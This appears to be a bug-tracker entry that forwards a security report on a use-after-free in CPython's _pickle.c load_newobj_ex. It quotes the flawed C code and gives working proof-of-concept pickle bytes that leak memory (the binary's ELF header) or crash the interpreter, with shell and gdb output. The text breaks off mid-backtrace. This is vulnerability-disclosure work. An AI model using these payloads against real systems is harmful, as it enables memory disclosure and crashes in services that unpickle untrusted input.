New submission from Benjamin Peterson:
From Kurucsai Istvan on the security list:
I. Summary
There is a use-after-free in the load_newobj_ex function in _pickle.c that
results in an arbitrary read.
II. Source code
The functions in question:
static int
load_newobj_ex(UnpicklerObject *self)
{
PyObject *cls, *args, *kwargs;
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
PDATA_POP(self-stack, kwargs);
if (kwargs == NULL) {
return -1;
}
PDATA_POP(self-stack, args);
if (args == NULL) {
Py_DECREF(kwargs);
return -1;
}
PDATA_POP(self-stack, cls);
if (cls == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
return -1;
}
1. if (!PyType_Check(cls)) {
Py_DECREF(kwargs);
Py_DECREF(args);
2. Py_DECREF(cls);
PyErr_Format(st-UnpicklingError,
NEWOBJ_EX class argument must be a type, not %.200s,
3. Py_TYPE(cls)-tp_name);
return -1;
}
1. if cls is not a type object.
2. cls and its type object are freed.
3. Py_TYPE(cls)-tp_name is controlled after the free due to Python memory
management internals, allowing arbitrary memory addresses to be leaked in the
exception text.
III. Proof of concept
The following PoC demonstrates the bug by leaking the beginning of the ELF
header of the python binary by using the following pickle:
0: FFLOAT -17.0
5: GBINFLOAT 4.850517136297445e-270
14: \x8a LONG1
-19433009197182618361932444855909718650799116435779157138706600511804357054621081254113158779140316034172772336611031765078550355689018943570873089549265771354179136777133140299700701757440
94: \x92 NEWOBJ_EX
95: .STOP
highest protocol among opcodes = 4
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# cat
/opt/newobj_ex.py
import pickle
b = b\x46\x2D\x31\x37\x0A\x47
# read address, beginning of the ELF header of the python binary
b += b\x08\x04\x80\x00
b +=
b\xE0\xFC\xBD\x8D\x8A\x4E\x00\x00\x00\x77\x55\x73\x41\xDE\x8D\xEA\x43\xDD\xB9\xDE\x10\xAE\x84\xAE\x15\x69\x3C\x9A\x34\x9C\x1B\x06\xE9\x68\x84\x5E\x3E\x74\x55\x55\x01\x5F\x65\x2E\x93\x83\x2D\x14\x36\x40\xA9\xEA\xAD\xFE\x77\x2D\x0F\x37\x8F\xE2\xFB\x18\xD6\x89\xDC\x75\x53\xB3\x15\xF1\x56\x17\x2F\x21\x78\x02\x7A\xBB\x95\x7B\x82\x40\x8A\xB8\x92.
pickle.loads(b)
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# file python
python: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
linked (uses shared libs), for GNU/Linux 2.6.24,
BuildID[sha1]=e1a1b72a0e3093b61de9de9bb58b3ca031aeb9b6, not stripped
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# ./python
Python 3.6.0a0 (default, Jun 29 2015, 22:03:19)
[GCC 4.8.2] on linux
Type help, copyright, credits or license for more information.
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# ./python
/opt/newobj_ex.py
Traceback (most recent call last):
File /opt/newobj_ex.py, line 4, in module
pickle.loads(b)
_pickle.UnpicklingError: NEWOBJ_EX class argument must be a type, not ELF
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629#
By changing the read address, a segfault can be triggered:
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# cat
/opt/newobj_ex_crash.py
import pickle
b = b\x46\x2D\x31\x37\x0A\x47
# read address
b += b\x41\x41\x41\x41
b
+=b\xE0\xFC\xBD\x8D\x8A\x4E\x00\x00\x00\x77\x55\x73\x41\xDE\x8D\xEA\x43\xDD\xB9\xDE\x10\xAE\x84\xAE\x15\x69\x3C\x9A\x34\x9C\x1B\x06\xE9\x68\x84\x5E\x3E\x74\x55\x55\x01\x5F\x65\x2E\x93\x83\x2D\x14\x36\x40\xA9\xEA\xAD\xFE\x77\x2D\x0F\x37\x8F\xE2\xFB\x18\xD6\x89\xDC\x75\x53\xB3\x15\xF1\x56\x17\x2F\x21\x78\x02\x7A\xBB\x95\x7B\x82\x40\x8A\xB8\x92.
pickle.loads(b)
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# gdb --silent
./python
Reading symbols from ./python...done.
(gdb) r /opt/newobj_ex_crash.py
Starting program: /opt/cpython/cpython-d792dc240456-150629/python
/opt/newobj_ex_crash.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library /lib/i386-linux-gnu/libthread_db.so.1.
Program received signal SIGSEGV, Segmentation fault.
0x081431dd in unicode_fromformat_write_cstr (writer=writer@entry=0xd11c,
str=0x41414141 error: Cannot access memory at address 0x41414141,
width=width@entry=-1, precision=precision@entry=200) at
Objects/unicodeobject.c:2368
2368length = strlen(str);
(gdb) bt
#0 0x081431dd in unicode_fromformat_write_cstr
(writer=writer@entry=0xd11c, str=0x41414141 error: Cannot access memory at
address 0x41414141, width=width@entry=-1, precision=precision@entry=200) at
Objects/unicodeobject.c:2368
#1 0x08143a2a in unicode_fromformat_arg (writer=writer@entry=0xd11c,
f=0xf7b9f632 s, f@entry=0xf7b9f62d %.200s, vargs=vargs@entry=0xd118) at
Objects/unicodeobject.c:2583
#2 0x08144018 in PyUnicode_FromFormatV (format=optimized out,